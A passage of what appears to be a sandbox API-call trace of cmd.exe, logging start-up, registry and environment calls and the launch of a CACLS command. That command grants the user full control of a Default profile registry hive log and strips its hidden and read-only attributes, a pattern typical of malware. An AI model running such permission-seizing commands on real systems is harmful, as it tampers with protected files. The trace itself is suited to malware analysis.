"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 744 os_tid = 0xa3c [0215.649] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa5c | out: lpSystemTimeAsFileTime=0x2efa5c*(dwLowDateTime=0xb5577f40, dwHighDateTime=0x1d440a9)) [0215.650] GetCurrentProcessId () returned 0xb28 [0215.650] GetCurrentThreadId () returned 0xa3c [0215.650] GetTickCount () returned 0x3c5ae [0215.650] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa54 | out: lpPerformanceCount=0x2efa54*=27243879338) returned 1 [0215.650] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.650] __set_app_type (_Type=0x1) [0215.650] __p__fmode () returned 0x76b331f4 [0215.650] __p__commode () returned 0x76b331fc [0215.650] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.650] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.650] GetCurrentThreadId () returned 0xa3c [0215.651] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa3c) returned 0x38 [0215.651] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.651] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.651] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.651] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.651] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef9ec | out: phkResult=0x2ef9ec*=0x0) returned 0x2 [0215.651] VirtualQuery (in: lpAddress=0x2efa23, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.651] GetConsoleOutputCP () returned 0x1b5 [0215.651] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.651] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.651] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.651] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.652] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.652] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.652] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.652] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.652] SetConsoleMode (hConsoleHandle=0x3, 
dwMode=0x1a7) returned 1 [0215.652] GetEnvironmentStringsW () returned 0x4f0198* [0215.652] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0215.652] GetEnvironmentStringsW () returned 0x4f0198* [0215.653] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0215.653] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee95c | out: phkResult=0x2ee95c*=0x40) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0xc0, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x0, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegCloseKey (hKey=0x40) returned 0x0 [0215.653] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee95c | out: phkResult=0x2ee95c*=0x40) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x0, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x9, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x9, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: 
lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x9, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegCloseKey (hKey=0x40) returned 0x0 [0215.653] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.653] srand (_Seed=0x5b8863b1) [0215.653] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" [0215.653] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" [0215.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.654] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.654] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.654] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.654] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.654] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.654] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.654] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.654] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.654] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.654] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.654] _wcsicmp (_String1="PROMPT", 
_String2="RANDOM") returned -2 [0215.654] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.654] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.654] GetEnvironmentStringsW () returned 0x4f22e8* [0215.654] FreeEnvironmentStringsW (penv=0x4f22e8) returned 1 [0215.654] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.654] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.654] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.654] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.654] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.654] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.654] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.654] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.654] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.654] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.655] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef728 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.655] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef728, lpFilePart=0x2ef724 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef724*="Desktop") returned 0x18 [0215.655] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.655] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4a4 | out: lpFindFileData=0x2ef4a4) returned 0x4f0028 [0215.655] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0215.655] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4a4 | out: lpFindFileData=0x2ef4a4) returned 
0x4f0028 [0215.655] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0215.655] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4a4 | out: lpFindFileData=0x2ef4a4) returned 0x4f0028 [0215.655] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0215.655] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.655] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.655] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.655] GetEnvironmentStringsW () returned 0x4f2b08* [0215.656] FreeEnvironmentStringsW (penv=0x4f2b08) returned 1 [0215.656] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.656] GetConsoleOutputCP () returned 0x1b5 [0215.656] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.656] GetUserDefaultLCID () returned 0x409 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef868, cchData=128 | out: lpLCData="0") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef868, cchData=128 | out: lpLCData="0") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef868, cchData=128 | out: lpLCData="1") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 
[0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.657] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.658] GetConsoleTitleW (in: lpConsoleTitle=0x4e08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.658] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.659] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.659] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.659] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0215.660] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0215.660] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0215.660] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0215.660] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0215.660] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0215.660] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 
[0215.660] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0215.662] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0215.662] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0215.662] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0215.662] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0215.662] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0215.662] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0215.662] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0215.663] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.663] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0215.663] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0215.663] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0215.663] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0215.663] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0215.663] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0215.664] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0215.664] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0215.664] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0215.664] 
_wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0215.664] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0215.664] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0215.664] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0215.664] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0215.664] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0215.664] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0215.664] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0215.664] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0215.664] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0215.664] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0215.664] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0215.664] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0215.664] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0215.664] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 
[0215.664] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0215.664] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0215.665] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0215.665] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0215.665] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0215.665] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0215.665] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0215.665] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0215.665] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0215.665] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0215.665] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0215.665] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0215.665] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0215.665] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0215.665] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0215.665] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0215.665] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0215.665] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0215.665] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0215.665] _wcsicmp (_String1="CACLS", _String2="MOVE") 
returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0215.665] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0215.665] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0215.665] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0215.665] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0215.665] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0215.665] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0215.665] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0215.666] SetErrorMode (uMode=0x0) returned 0x0 [0215.666] SetErrorMode (uMode=0x1) returned 0x0 [0215.666] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f1ba0, lpFilePart=0x2ef01c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef01c*="Desktop") returned 0x18 [0215.666] SetErrorMode (uMode=0x0) returned 0x1 [0215.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.666] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.671] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.671] FindClose (in: hFindFile=0x4e0f70 | out: hFindFile=0x4e0f70) returned 1 [0215.672] FindClose (in: hFindFile=0x4e0f70 | out: hFindFile=0x4e0f70) returned 1 [0215.672] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0215.672] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0215.672] GetConsoleTitleW (in: lpConsoleTitle=0x2ef290, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.773] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef118, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef1e0 | out: lpAttributeList=0x2ef118, lpSize=0x2ef1e0) returned 1 [0215.773] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef118, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef1d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef118, lpPreviousValue=0x0) returned 1 [0215.773] GetStartupInfoW (in: lpStartupInfo=0x2ef0d4 | out: lpStartupInfo=0x2ef0d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0215.773] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.774] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef174*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 